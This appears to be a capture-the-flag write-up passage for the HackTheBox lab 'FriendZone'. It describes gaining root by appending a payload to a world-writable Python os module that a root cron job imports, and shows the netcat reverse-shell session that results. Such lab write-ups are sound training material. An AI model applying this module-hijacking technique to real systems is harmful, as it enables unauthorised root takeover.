Python Module Hijacking
- The
osmodule forPython 2.7has been discovered to be writable by ANYONE - On top of that, there is a root cronjob that is executing a Python script located at
/opt/server_admin/reporter.py /opt/server_admin/reporter.pyuses Python 2.7.15rc1 and theosmodule
I will be hijacking the Python os module to get code execution
Delivery
I could physically deliver the payload, but it’s unnecessary as I already have a valid SSH session.
I will use nano to append the payload to the bottom of the os module located at /usr/lib/python2.7/os.py
Done!
Netcat listener is also set in Kali. It’s just a waiting game now.
Privilege Escalation
┌──(kali㉿kali)-[~/archive/htb/labs/friendzone]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.123] 40248
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# hostname
FriendZone
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:b9:70:23 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.123/23 brd 10.10.11.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:7023/64 scope global dynamic mngtmpaddr
valid_lft 86392sec preferred_lft 14392sec
inet6 fe80::250:56ff:feb9:7023/64 scope link
valid_lft forever preferred_lft forever
System Level Compromise